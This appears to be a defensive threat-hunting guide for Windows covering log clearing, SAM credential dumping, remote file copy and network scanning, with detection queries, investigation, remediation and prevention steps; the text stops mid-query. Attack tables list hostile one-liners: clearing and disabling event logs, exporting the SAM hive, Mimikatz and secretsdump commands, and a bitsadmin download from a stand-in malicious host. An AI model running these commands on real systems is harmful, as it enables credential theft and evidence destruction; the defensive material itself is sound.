| **Technique**                | **Description**                        | **Example Command**                                                              |
| ---------------------------- | -------------------------------------- | -------------------------------------------------------------------------------- |
| **Delete Event Logs**        | Erase Windows event logs               | `wevtutil cl Security`                                                           |
| **Clear PowerShell History** | Remove traces from command history     | `Remove-Item (Get-PSReadlineOption).HistorySavePath`                             |
| **Delete Files/Artifacts**   | Remove malware payloads or logs        | `del C:\Temp\malicious.exe`                                                      |
| **Remove Registry Entries**  | Clean persistence artifacts            | `reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MalwareKey /f` |
| **Disable Logging**          | Temporarily stop event logging         | `wevtutil sl Security /e:false`                                                  |
| **Self-Delete Script**       | Malware deletes itself after execution | `cmd.exe /c timeout 5 && del %~f0`                                               |

***

### 🛡️ **2. Detection Techniques**

#### 📊 **Manual Inspection**

**🕵️ Check for Cleared Event Logs**

```powershell
wevtutil qe Security /c:10 /f:text
```

* Look for abrupt log gaps or absence of expected events.

**🕵️ Inspect PowerShell Command History**

```powershell
(Get-PSReadlineOption).HistorySavePath
Get-Content (Get-PSReadlineOption).HistorySavePath
```

* Look for unusual deletions or clearing commands.

**🕵️ Check System Logs for Clearing Commands**

```powershell
Get-WinEvent -LogName Security | Where-Object { $_.Message -like "*wevtutil cl*" }
```

**🕵️ Search for Recent File Deletions**

```powershell
Get-ChildItem -Path "C:\Temp" -Recurse | Where-Object { $_.LastWriteTime -gt (Get-Date).AddHours(-24) }
```

**🕵️ Check Registry Modifications**

```powershell
Get-ChildItem -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Recurse
```

***

#### 📊 **Microsoft Defender for Endpoint (MDE) Query (KQL)**

**🕵️ Detect Log Clearing Commands**

```kusto
DeviceProcessEvents
| where FileName in~ ("wevtutil.exe", "powershell.exe", "cmd.exe")
| where ProcessCommandLine contains "wevtutil cl" or ProcessCommandLine contains "Clear-EventLog"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
```

**🕵️ Detect PowerShell History Manipulation**

```kusto
DeviceFileEvents
| where FolderPath contains "AppData\\Roaming\\Microsoft\\Windows\\PowerShell"
| where FileName contains "ConsoleHost_history.txt"
| where ActionType in ("FileDeleted", "FileModified")
| project Timestamp, DeviceName, FileName, FolderPath, AccountName
```

**🕵️ Identify Deleted Files and Artifacts**

```kusto
DeviceFileEvents
| where ActionType == "FileDeleted"
| where FolderPath contains "Temp" or FolderPath contains "AppData"
| project Timestamp, DeviceName, FileName, FolderPath, AccountName
```

**🕵️ Detect Service or Task Deletion**

```kusto
DeviceProcessEvents
| where FileName == "sc.exe" or FileName == "schtasks.exe"
| where ProcessCommandLine contains "delete"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
```

**🕵️ Registry Cleanup Attempts**

```kusto
DeviceRegistryEvents
| where ActionType == "RegistryValueDeleted"
| where RegistryKey contains "Run"
| project Timestamp, DeviceName, RegistryKey, AccountName
```

***

#### 📊 **Event Viewer Logs**

| **Event ID** | **Description**             |
| ------------ | --------------------------- |
| **1102**     | The audit log was cleared   |
| **4688**     | A new process was created   |
| **4657**     | Registry value modification |
| **4663**     | Object access attempt       |

**📌 Focus on Event ID 1102 (Audit Log Cleared)**

* Open **Event Viewer → Windows Logs → Security**
* Look for sudden clearing of logs.

**📌 Monitor for Suspicious Processes (Event ID 4688)**

* Look for commands using `wevtutil`, `del`, `Remove-Item`, or `reg delete`.

***

### 🕵️ **3. Investigation Techniques**

#### 1️⃣ **Trace Log Clearing Activities**

* Identify the account and source IP involved:

```powershell
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=1102}
```

#### 2️⃣ **Correlate Deleted Files with Processes**

* Investigate who and what deleted files:

```powershell
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4663}
```

#### 3️⃣ **Review Command History**

* Check recent command history:

```powershell
Get-Content (Get-PSReadlineOption).HistorySavePath | Select-String "wevtutil|Clear-EventLog|Remove-Item"
```

#### 4️⃣ **Inspect Registry for Evidence**

* Identify modified or deleted registry keys:

```powershell
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
```

#### 5️⃣ **Cross-Reference File Hashes**

* Validate hash integrity:

```powershell
Get-FileHash "C:\Temp\payload.exe"
```
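
Step 1 asks for the account and source IP behind a log clear, but 1102 carries no IP. As an added example that is not code from the original page, the function below reads the clearing account from the 1102 `UserData` block (this event does not use `EventData` like most Security events) and joins it on `SubjectLogonId` to the 4624 logon that created that session, which does record the logon type, workstation and source address. Because the clear wipes the live Security log, the `-Path` parameter is there to run the same join against a forwarded or backed-up `.evtx`; the parameters and output shape are this example's own.

```powershell
# Added example, not from the original page: attribute 1102 "audit log cleared" events to the
# logon session (and source IP) that performed them by joining on the logon ID from 4624.
function Get-LogClearingSession {
    param(
        [string]$Path,            # exported/forwarded .evtx; omitted = live Security log
        [int]$Days = 30
    )
    $source = if ($Path) { @{ Path = $Path } } else { @{ LogName = 'Security' } }
    $since  = (Get-Date).AddDays(-$Days)

    # LogonId -> session details from 4624; the clear event itself has no network fields
    $logons = @{}
    Get-WinEvent -FilterHashtable ($source + @{ Id = 4624; StartTime = $since }) -ErrorAction SilentlyContinue | ForEach-Object {
        $d = @{}
        foreach ($n in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        $logons[$d['TargetLogonId']] = [pscustomobject]@{
            Account     = "$($d['TargetDomainName'])\$($d['TargetUserName'])"
            LogonType   = $d['LogonType']      # 2 interactive, 3 network, 10 RDP
            SourceIP    = $d['IpAddress']
            Workstation = $d['WorkstationName']
            LogonTime   = $_.TimeCreated
        }
    }

    Get-WinEvent -FilterHashtable ($source + @{ Id = 1102; StartTime = $since }) -ErrorAction SilentlyContinue | ForEach-Object {
        # 1102 is written by the Eventlog provider and uses UserData/LogFileCleared, not EventData
        $x = ([xml]$_.ToXml()).Event.UserData.LogFileCleared
        $session = $logons[[string]$x.SubjectLogonId]
        $note = if ($session) { '' } else { 'no matching 4624 in this log: session predates the clear, or the log was rotated' }
        [pscustomobject]@{
            ClearedAt   = $_.TimeCreated
            ClearedBy   = "$($x.SubjectDomainName)\$($x.SubjectUserName)"
            LogonId     = $x.SubjectLogonId
            LogonType   = $session.LogonType
            SourceIP    = $session.SourceIP
            Workstation = $session.Workstation
            SessionFrom = $session.LogonTime
            Note        = $note
        }
    }
}

# Live log first; then rerun against a forwarded copy, e.g. -Path "<collector share>\Security.evtx" (placeholder)
Get-LogClearingSession -Days 30 | Format-List
```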

***

### 🔧 **4. Remediation Steps**

#### 📌 **1. Restart Event Logging**

```powershell
wevtutil sl Security /e:true
```

#### 📌 **2. Restore Logs from Backup**

* Restore event logs if backups are available.

#### 📌 **3. Investigate Deleted Files and Artifacts**

* Use forensic tools like **Recuva** or **FTK Imager** to recover deleted files.

#### 📌 **4. Remove Malicious Registry Entries**

```powershell
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "MaliciousKey"
```

#### 📌 **5. Quarantine Suspicious Files**

```powershell
Move-Item -Path "C:\Temp\malware.exe" -Destination "C:\Quarantine"
```

#### 📌 **6. Perform Full Antivirus Scan**

```powershell
Start-MpScan -ScanType FullScan
```

***

### 🛡️ **5. Prevention Steps**

1. **Enable Security Auditing:**
   * Ensure **Event ID 1102, 4688, 4663** are enabled.
2. **Enable Tamper Protection:**

```powershell
# Set-MpPreference has no Tamper Protection parameter; enable it in the Windows Security app
# (Virus & threat protection settings) or through Intune / the Defender portal, then verify:
Get-MpComputerStatus | Select-Object IsTamperProtected
```

3. **Monitor Log Clearing Tools:**
   * Watch for `wevtutil`, `Clear-EventLog`, `Remove-Item`.
4. **Restrict Admin Privileges:**
   * Prevent unauthorized users from clearing logs or modifying the registry.
5. **Implement Attack Surface Reduction (ASR) Rules:**

```powershell
# D4F940AB-401B-4EFC-AADC-AD5F3C50688A = "Block all Office applications from creating child processes"
Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled
```

6. **Disable Command History Clearing:**
   * Enforce retention policies for command history.
7. **Regular Backups:**
   * Periodically back up event logs and critical system data.

***

### 🧠 **6. Key Takeaways**

* **Monitor Event Log Clearing:** Event ID **1102** is critical.
* **File Deletions Are a Red Flag:** Especially in `Temp` or `AppData`.
* **Audit Critical Registry Keys:** Monitor `Run` and `RunOnce` entries.
* **Prevent Tampering:** Enable **Windows Defender Tamper Protection**.

***

## 🚨 **OS Credential Dumping: Security Account Manager (SAM)**

### 🔍 **1. Attack Breakdown**

#### 📝 **What is SAM Credential Dumping?**

* **Security Account Manager (SAM)** is a **Windows database file** that stores **local account credentials (NTLM and LM hashes)**.
* **Credential dumping** involves extracting these hashes to **escalate privileges**, **move laterally**, or **crack passwords offline**.

#### 📑 **Why Do Attackers Use SAM Credential Dumping?**

* **Access Local Accounts:** Gain access to local administrator accounts.
* **Privilege Escalation:** Use compromised accounts for elevated permissions.
* **Offline Hash Cracking:** Crack NTLM hashes without alerting security systems.
* **Persistence:** Use stolen hashes for **Pass-the-Hash (PtH)** attacks.

#### 📌 **Common Methods for SAM Credential Dumping**

| **Technique**                          | **Tool/Command Example**              | **Description**                                |
| -------------------------------------- | ------------------------------------- | ---------------------------------------------- |
| **Local Copy of SAM and SYSTEM Files** | `copy C:\Windows\System32\config\SAM` | Copy SAM and SYSTEM files for offline analysis |
| **Mimikatz SAM Module**                | `lsadump::sam`                        | Dump SAM hashes directly from memory           |
| **Reg Save Method**                    | `reg save HKLM\SAM C:\Temp\sam.save`  | Export SAM hive via the registry               |
| **Volume Shadow Copy**                 | `vssadmin create shadow /for=C:`      | Access SAM via shadow copies                   |
| **Impacket (secretsdump.py)**          | `secretsdump.py Administrator@IP`     | Dump SAM hashes remotely                       |

***

### 🛡️ **2. Detection Techniques**

#### 📊 **Manual Inspection with PowerShell**

**🕵️ Look for Suspicious Access to SAM Registry Hive**

```powershell
Get-EventLog -LogName Security -InstanceId 4663 | Where-Object { $_.Message -like "*SAM*" }
```

**🕵️ Monitor Registry Export Commands**

```powershell
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -like "*reg save HKLM\SAM*" }
```

**🕵️ Identify Shadow Copy Abuse**

```powershell
vssadmin list shadows
```

***

#### 📊 **Microsoft Defender for Endpoint (MDE) Query (KQL)**

**🕵️ Detect Access to SAM Files**

```kusto
DeviceFileEvents
| where FileName in ("SAM", "SYSTEM")
| where FolderPath contains "Windows\\System32\\config"
| where ActionType == "FileAccessed"
| project Timestamp, DeviceName, FileName, FolderPath, AccountName, InitiatingProcessFileName
```

**🕵️ Detect Registry Hive Export (reg save HKLM\SAM)**

```kusto
DeviceProcessEvents
| where FileName == "reg.exe"
| where ProcessCommandLine contains "save"
| where ProcessCommandLine contains "SAM"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
```

**🕵️ Detect Shadow Copy Abuse**

```kusto
DeviceProcessEvents
| where FileName == "vssadmin.exe"
| where ProcessCommandLine contains "create shadow"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
```

**🕵️ Identify Mimikatz Execution**

```kusto
DeviceProcessEvents
| where FileName contains "mimikatz.exe" or ProcessCommandLine contains "lsadump::sam"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
```

**🕵️ Remote SAM Dumping with Impacket**

```kusto
DeviceNetworkEvents
| where RemoteIP != "127.0.0.1"
| where InitiatingProcessCommandLine contains "secretsdump.py"
| project Timestamp, DeviceName, RemoteIP, InitiatingProcessCommandLine
```

***

#### 📊 **Event Viewer Logs**

| **Event ID** | **Description**                                              |
| ------------ | ------------------------------------------------------------ |
| **4663**     | An attempt was made to access an object (SAM file access).   |
| **4688**     | A new process was created (e.g., `reg.exe`, `mimikatz.exe`). |
| **4624**     | Account logon (especially administrative accounts).          |
| **4724**     | An attempt was made to reset an account's password.          |
| **5145**     | A network share object was accessed.                         |

**📌 Focus on Event ID 4663:**

* Object Access attempts for `HKLM\SAM` or `C:\Windows\System32\config\SAM`.

**📌 Event ID 4688:**

* Look for suspicious processes:
  * `reg.exe`
  * `vssadmin.exe`
  * `mimikatz.exe`

***

### 🕵️ **3. Investigation Techniques**

#### 1️⃣ **Identify Registry Export Commands**

* Search for SAM exports:

```powershell
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -like "*reg save HKLM\SAM*" }
```

***

#### 2️⃣ **Inspect Shadow Copies**

* List all shadow copies:

```powershell
vssadmin list shadows
```

* Look for unusual creation timestamps.

***

#### 3️⃣ **Analyze Active Processes**

* Identify active processes accessing SAM files:

```powershell
Get-Process -Name reg, vssadmin, mimikatz -IncludeUserName
```

***

#### 4️⃣ **Trace Malicious Tools**

* Search common tool artifacts:

```powershell
Get-ChildItem -Path "C:\Temp", "C:\Users\Public" -Recurse | Where-Object { $_.Name -match "mimikatz|secretsdump" }
```

***

#### 5️⃣ **Check for Remote Credential Dumps**

* Inspect network logs for suspicious remote connections:

```powershell
Get-NetTCPConnection | Where-Object { $_.RemoteAddress -notlike "192.168.*" }
```

***

### 🔧 **4. Remediation Steps**

#### 📌 **1. Change Local Account Passwords**

* Immediately reset local admin passwords:

```powershell
net user Administrator NewP@ssw0rd!
```

#### 📌 **2. Remove Malicious Shadow Copies**

* This removes **all** shadow copies (and with them the restore points) on `C:`; preserve the copy the attacker created for forensics before deleting.

```powershell
vssadmin delete shadows /for=C: /all /quiet
```

#### 📌 **3. Block Tools (Mimikatz, Impacket)**

* Use **AppLocker** or **WDAC** to block these tools.

#### 📌 **4. Review Local Admin Group Memberships**

```powershell
net localgroup Administrators
```

#### 📌 **5. Enable Logging and Auditing**

* Ensure **Event IDs 4663, 4688, and 4624** are monitored.

#### 📌 **6. Perform Full Antivirus Scan**

```powershell
Start-MpScan -ScanType FullScan
```

***

### 🛡️ **5. Prevention Steps**

1. **Enable LSASS Protection:**

```powershell
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f
```

2. **Monitor Access to SAM Files:**
   * Enable auditing on:
     * `C:\Windows\System32\config\SAM`
     * `HKLM\SAM`
3. **Restrict Registry Access:**
   * Limit local admin privileges.
4. **Block Tool Execution:**
   * Use **Application Control Policies (AppLocker)** to block `mimikatz.exe`, `secretsdump.py`.
5. **Use Credential Guard:**
   * Enable **Windows Defender Credential Guard**.
6. **Limit Local Admin Accounts:**
   * Disable unused local admin accounts.

***

### 🧠 **6. Key Takeaways**

* **SAM Database is Critical:** Protect it with auditing and access control.
* **Monitor Registry Access:** Look for `reg save HKLM\SAM`.
* **Detect Shadow Copy Abuse:** Monitor `vssadmin` commands.
* **Credential Guard is Essential:** Prevent access to LSASS and SAM hashes.
* **Block Known Tools:** Prevent execution of `mimikatz.exe` and `secretsdump.py`.

***

## 🚨 **Remote File Copy: Advanced Threat Analysis**

### 🔍 **1. Attack Breakdown**

#### 📝 **What is Remote File Copy?**

* **Remote File Copy** is an adversarial tactic where attackers **transfer files between systems** over a network to:
  * Deploy **malicious payloads**.
  * Exfiltrate **sensitive data**.
  * Move **toolkits** or **scripts** for post-exploitation activities.

#### 📑 **Why Attackers Use Remote File Copy?**

* **Payload Deployment:** Transfer malware, tools, or scripts for persistence or lateral movement.
* **Data Exfiltration:** Steal confidential files or credentials.
* **Stealth:** Use native tools (e.g., `xcopy`, `robocopy`, `scp`) to evade detection.
* **Remote Control:** Set up additional footholds on other systems.

#### 📌 **Common Techniques for Remote File Copy**

| **Technique**                   | **Tool/Command Example**                                         | **Purpose**                                          |
| ------------------------------- | ---------------------------------------------------------------- | ---------------------------------------------------- |
| **SMB Copy**                    | `copy \\target\C$\Temp\payload.exe`                              | Copy files via SMB                                   |
| **PSExec (Sysinternals)**       | `psexec \\target -c payload.exe`                                 | Deploy payload using PsExec                          |
| **PowerShell Copy**             | `Copy-Item -Path .\payload.exe -Destination \\target\C$\Temp`    | Copy via PowerShell                                  |
| **RDP File Drop**               | File transfer using Remote Desktop                               | Upload malicious files                               |
| **FTP Transfer**                | `ftp <target>`                                                   | Transfer files via FTP                               |
| **SCP (Secure Copy Protocol)**  | `scp file.txt user@remote:/tmp/`                                 | Transfer files securely                              |
| **WinRM (PowerShell Remoting)** | `Invoke-Command -ComputerName target -ScriptBlock { Copy-Item }` | Copy files using WinRM                               |
| **BITSAdmin Abuse**             | `bitsadmin /transfer malware http://malicious.com/payload.exe`   | Download via Background Intelligent Transfer Service |

***

### 🛡️ **2. Detection Techniques**

#### 📊 **Manual Inspection with PowerShell**

**🕵️ Check Recent File Transfers via SMB**

```powershell
Get-SmbSession
```

* Look for **unusual remote sessions**.

**🕵️ Review PowerShell File Copy History**

```powershell
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} | Where-Object { $_.Message -like "*Copy-Item*" }
```

**🕵️ Identify Recent Remote Connections**

```powershell
Get-NetTCPConnection | Where-Object { $_.RemoteAddress -notlike "192.168.*" }
```

**🕵️ Check Remote Desktop File Transfers**

* Review **RDP logs** at:

```
Event Viewer → Applications and Services Logs → Microsoft → Windows → TerminalServices-LocalSessionManager
```

***

#### 📊 **Microsoft Defender for Endpoint (MDE) Query (KQL)**

**🕵️ Detect SMB File Copy Activity**

```kusto
DeviceFileEvents
| where ActionType == "FileCreated"
| where InitiatingProcessFileName in~ ("cmd.exe", "powershell.exe", "robocopy.exe", "xcopy.exe", "psexec.exe")
| where FolderPath startswith "\\"
| project Timestamp, DeviceName, FileName, FolderPath, AccountName, InitiatingProcessCommandLine
```

**🕵️ Detect FTP or SCP Commands**

```kusto
DeviceProcessEvents
| where ProcessCommandLine contains "ftp" or ProcessCommandLine contains "scp"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
```

**🕵️ Monitor PowerShell Remote Copy Attempts**

```kusto
DeviceProcessEvents
| where FileName == "powershell.exe"
// a KQL string "\\" is a single backslash, which every local path contains; "\\\\" is the UNC prefix
| where ProcessCommandLine contains "Copy-Item" or ProcessCommandLine contains "\\\\"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
```

**🕵️ Detect BITSAdmin Abuse**

```kusto
DeviceProcessEvents
| where FileName == "bitsadmin.exe"
| where ProcessCommandLine contains "/transfer"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
```

**🕵️ Identify Unusual Remote Sessions**

```kusto
DeviceNetworkEvents
| where RemotePort == 445 or RemotePort == 3389
| where InitiatingProcessFileName in~ ("cmd.exe", "powershell.exe")
| project Timestamp, DeviceName, RemoteIP, RemotePort, InitiatingProcessCommandLine, AccountName
```

***

#### 📊 **Event Viewer Logs**

| **Event ID** | **Description**                                       |
| ------------ | ----------------------------------------------------- |
| **5145**     | A network share object was accessed.                  |
| **4663**     | Object access attempt (file copy attempt).            |
| **4688**     | A new process was created.                            |
| **4104**     | PowerShell Script Block Logging (Copy-Item commands). |
| **7045**     | A new service was installed (via PsExec).             |

**📌 Focus on Event ID 5145:**

* Look for file copy activity over SMB.
* Monitor logs for `\\`, `UNC paths`, or abnormal accounts.

**📌 Focus on Event ID 4688:**

* Identify suspicious commands using:
  * `robocopy.exe`
  * `xcopy.exe`
  * `psexec.exe`
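A Python triage of the Event ID 4688 command-line indicators named on this page, covering both the SAM dumping section above (`reg save HKLM\SAM`, `vssadmin create shadow`, `lsadump::sam`) and this section (`bitsadmin /transfer`, PsExec `-c`, `Copy-Item` to a UNC path). This is an added example, not code from the original page; the 4688 messages are constructed to follow the Security-log field layout, and the rule labels and the `http://example.invalid` URL are assumptions.

```python
"""Triage Security Event ID 4688 messages for the command-line indicators on this page.

Added example (not from the original page): the rules cover the SAM-dumping and
remote-file-copy indicators listed above. Sample messages are constructed.
"""
import re
from typing import Dict, List, NamedTuple, Optional


class Hit(NamedTuple):
    technique: str      # rule label (an assumption, not an MDE or MITRE identifier)
    image: str          # process image name, lower-cased
    command_line: str


# (label, process images the rule applies to or None for any, regex over the command line)
RULES = [
    ("sam-hive-export", {"reg.exe"}, re.compile(r"\bsave\b.*\bHKLM\\SAM\b", re.I)),
    ("shadow-copy-create", {"vssadmin.exe"}, re.compile(r"\bcreate\s+shadow\b", re.I)),
    ("mimikatz-sam", None, re.compile(r"lsadump::sam", re.I)),
    ("bits-transfer", {"bitsadmin.exe"}, re.compile(r"/transfer\b", re.I)),
    ("psexec-copy", {"psexec.exe", "psexec64.exe"}, re.compile(r"\\\\\S+.*\s-c\b", re.I)),
    ("powershell-unc-copy", {"powershell.exe", "pwsh.exe"},
     re.compile(r"Copy-Item.*\\\\[^\s\\]+\\", re.I)),
]

# The two 4688 fields the rules need; re.M makes $ stop at each line end.
FIELD_RE = {
    "image": re.compile(r"New Process Name:\s*(?P<v>\S.*?)\s*$", re.M),
    "cmdline": re.compile(r"Process Command Line:\s*(?P<v>.*?)\s*$", re.M),
}


def parse_4688(message: str) -> Optional[Dict[str, str]]:
    """Extract New Process Name and Process Command Line; None if the layout is not 4688."""
    fields: Dict[str, str] = {}
    for key, rx in FIELD_RE.items():
        m = rx.search(message)
        if m is None:
            return None
        fields[key] = m.group("v")
    return fields


def triage(message: str) -> List[Hit]:
    """Return every rule that matches one 4688 message.

    An empty Process Command Line means command-line auditing is off on that host:
    nothing can match, which is itself worth surfacing in the audit configuration.
    """
    fields = parse_4688(message)
    if fields is None or not fields["cmdline"]:
        return []
    image = fields["image"].rsplit("\\", 1)[-1].lower()
    hits: List[Hit] = []
    for label, images, rx in RULES:
        if images is not None and image not in images:
            continue
        if rx.search(fields["cmdline"]):
            hits.append(Hit(label, image, fields["cmdline"]))
    return hits


def make_4688(image: str, cmdline: str, account: str = "jdoe") -> str:
    """Constructed 4688 message using the Security-log field layout (only the fields used here)."""
    return (
        "A new process has been created.\n\nCreator Subject:\n"
        f"\tAccount Name:\t\t{account}\n\nProcess Information:\n"
        "\tNew Process ID:\t\t0x1a2c\n"
        f"\tNew Process Name:\t{image}\n"
        f"\tProcess Command Line:\t{cmdline}\n"
    )


# Constructed: four indicators, one benign query, one host without command-line auditing.
SAMPLE_4688 = [
    make_4688(r"C:\Windows\System32\reg.exe", r"reg  save HKLM\SAM C:\Temp\sam.save"),
    make_4688(r"C:\Windows\System32\vssadmin.exe", "vssadmin create shadow /for=C:"),
    make_4688(r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin /transfer updjob http://example.invalid/update.bin C:\Users\Public\u.bin"),
    make_4688(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -Command Copy-Item .\tool.exe \\fileserver\C$\Temp"),
    make_4688(r"C:\Windows\System32\reg.exe", r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion"),
    make_4688(r"C:\Windows\System32\reg.exe", ""),
]


if __name__ == "__main__":
    for msg in SAMPLE_4688:
        for hit in triage(msg):
            print(f"{hit.technique:22} {hit.image:16} {hit.command_line}")
```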

***

### 🕵️ **3. Investigation Techniques**

#### 1️⃣ **Inspect SMB Sessions**

* List current SMB connections:

```powershell
Get-SmbSession | Format-Table
```

***

#### 2️⃣ **Trace Command-Line Activity**

* Search for file copy commands:

```powershell
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -like "*Copy-Item*" }
```

***

#### 3️⃣ **Check BITSAdmin Transfers**

* Review current BITS jobs:

```powershell
bitsadmin /list /allusers /verbose
```

***

#### 4️⃣ **Inspect RDP Session Logs**

* Review file transfers via RDP logs:

```powershell
Get-WinEvent -LogName "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
```

***

#### 5️⃣ **Check FTP or SCP Activity**

* Look for FTP logs in:

```
C:\Windows\System32\LogFiles\FTPSVC2\
```

***

### 🔧 **4. Remediation Steps**

#### 📌 **1. Terminate Malicious Connections**

* `Stop-Process -Name` ends **every** process with that name, including the responder's own PowerShell session; prefer `Stop-Process -Id <PID>` for the specific process identified during investigation.

```powershell
Stop-Process -Name "powershell" -Force
Stop-Process -Name "psexec" -Force
```

#### 📌 **2. Disable Suspicious SMB Sessions**

```powershell
Close-SmbSession -SessionId <SessionID>
```

#### 📌 **3. Remove Malicious BITS Jobs**

```powershell
bitsadmin /reset /allusers
```

#### 📌 **4. Quarantine Malicious Files**

```powershell
Move-Item -Path "C:\Temp\payload.exe" -Destination "C:\Quarantine"
```

#### 📌 **5. Block Known Tools via AppLocker**

* `New-AppLockerPolicy` has no `-RuleType Deny` or `-Path` parameter; generate a path rule for the binary, switch its action to Deny in the XML, then merge it into the effective policy:

```powershell
$xml = (Get-AppLockerFileInformation -Path "C:\Windows\System32\psexec.exe" | New-AppLockerPolicy -RuleType Path -User Everyone -Xml) -replace 'Action="Allow"', 'Action="Deny"'
$xml | Set-Content "$env:TEMP\deny-psexec.xml"; Set-AppLockerPolicy -XmlPolicy "$env:TEMP\deny-psexec.xml" -Merge
```

#### 📌 **6. Perform Full Antivirus Scan**

```powershell
Start-MpScan -ScanType FullScan
```

***

### 🛡️ **5. Prevention Steps**

1. **Disable SMB v1:**

```powershell
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
```

2. **Limit Remote Access Tools:**
   * Restrict `psexec.exe`, `robocopy.exe`, `xcopy.exe`.
3. **Enable BITS Logging:**
   * Monitor BITS jobs via Windows Event Logs.
4. **Enable PowerShell Logging** (the policy key does not exist on a fresh host, so create it before setting the value):

```powershell
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord
```

5. **Use Network Segmentation:**
   * Restrict file-sharing access to authorized systems.
6. **Enable SIEM Alerts:**
   * Create alerts for commands like `copy`, `scp`, `robocopy`, and `bitsadmin`.

***

### 🧠 **6. Key Takeaways**

* **Native Tools Are Dangerous:** Attackers often use legitimate tools (`xcopy`, `robocopy`) for malicious purposes.
* **Monitor SMB and FTP Activity:** Look for unauthorized file transfers.
* **Enable Script Block Logging:** Ensure `PowerShell` and `BITS` commands are logged.
* **Restrict File Sharing Permissions:** Use least privilege for network shares.

***

## 🚨 **Network Service Scanning**

***

### 🔍 **1. Attack Breakdown**

#### 📝 **What is Network Service Scanning?**

* **Network Service Scanning** is the process where attackers **probe network devices, servers, or endpoints** to identify **open ports, running services, and vulnerabilities**.
* Common goals include:
  * **Identifying Targets:** Find exploitable systems and services.
  * **Mapping the Network Topology:** Understand the structure and key services.
  * **Finding Weak Services:** Detect outdated or misconfigured services.

***

#### 📑 **Why Attackers Use Network Service Scanning?**

* **Initial Reconnaissance:** Build a map of potential entry points.
* **Vulnerability Detection:** Find exploitable services.
* **Credential Spraying:** Identify systems where default credentials may still work.
* **Evasion Planning:** Identify security controls, firewalls, and intrusion detection systems.

***

#### 📌 **Common Tools Used for Network Scanning**

| **Tool**       | **Purpose**                    | **Command Example**                        |
| -------------- | ------------------------------ | ------------------------------------------ |
| **Nmap**       | Port & service scanning        | `nmap -sV -p 1-65535 <target>`             |
| **Masscan**    | High-speed port scanning       | `masscan -p1-65535 <target>`               |
| **Netcat**     | Port probing                   | `nc -zv <target> 80`                       |
| **ZMap**       | Internet-scale scanning        | `zmap -p 80 <target>`                      |
| **Shodan API** | Search exposed systems         | `shodan search port:22`                    |
| **Metasploit** | Service vulnerability scanning | `msfconsole -x "use scanner/portscan/tcp"` |

***

#### 📊 **Common Techniques for Network Scanning**

| **Technique**                 | **Description**                          | **Example Command**    |
| ----------------------------- | ---------------------------------------- | ---------------------- |
| **TCP Connect Scan**          | Check TCP connection to each port.       | `nmap -sT <target>`    |
| **Stealth Scan (SYN Scan)**   | Evade logging by sending SYN packets.    | `nmap -sS <target>`    |
| **UDP Scan**                  | Scan UDP services.                       | `nmap -sU <target>`    |
| **Service Version Detection** | Identify software versions.              | `nmap -sV <target>`    |
| **OS Detection**              | Identify the OS type and version.        | `nmap -O <target>`     |
| **Banner Grabbing**           | Extract server information from banners. | `nc <target> 80`       |
| **SNMP Scanning**             | Identify devices using SNMP.             | `onesixtyone <target>` |

***

### 🛡️ **2. Detection Techniques**

#### 📊 **Manual Inspection with PowerShell**

**🕵️ Review Firewall Logs for Scan Patterns**

```powershell
Get-WinEvent -LogName Security -FilterXPath "*[System[EventID=5156]]"
```

* Look for repeated connection attempts from a single IP across multiple ports.

***

**🕵️ Check Failed Authentication Attempts**

```powershell
Get-EventLog -LogName Security -InstanceId 4625
```

* Multiple failed login attempts on different services may indicate scanning.

***

**🕵️ Monitor for Suspicious Connections**

```powershell
Get-NetTCPConnection | Where-Object { $_.State -eq "Established" } | Select-Object LocalAddress, RemoteAddress, LocalPort, RemotePort
```

* Unusual connections across many ports from a single IP are suspicious.

***

#### 📊 **Microsoft Defender for Endpoint (MDE) Query (KQL)**

**🕵️ Detect Network Scanning Behavior**

```kusto
DeviceNetworkEvents
| where RemoteIP != "127.0.0.1"
// Timestamp and DeviceName do not survive summarize; keep them as aggregates and group by device
| summarize PortCount = dcount(RemotePort), FirstSeen = min(Timestamp), LastSeen = max(Timestamp) by DeviceName, RemoteIP
| where PortCount > 50
| project FirstSeen, LastSeen, DeviceName, RemoteIP, PortCount
```

**🕵️ Identify High Frequency Connections**

```kusto
DeviceNetworkEvents
| summarize ConnectionCount = count(), FirstSeen = min(Timestamp), LastSeen = max(Timestamp) by DeviceName, RemoteIP, RemotePort
| where ConnectionCount > 100
| project FirstSeen, LastSeen, DeviceName, RemoteIP, RemotePort, ConnectionCount
```

**🕵️ Detect Known Scanning Tools**

```kusto
DeviceProcessEvents
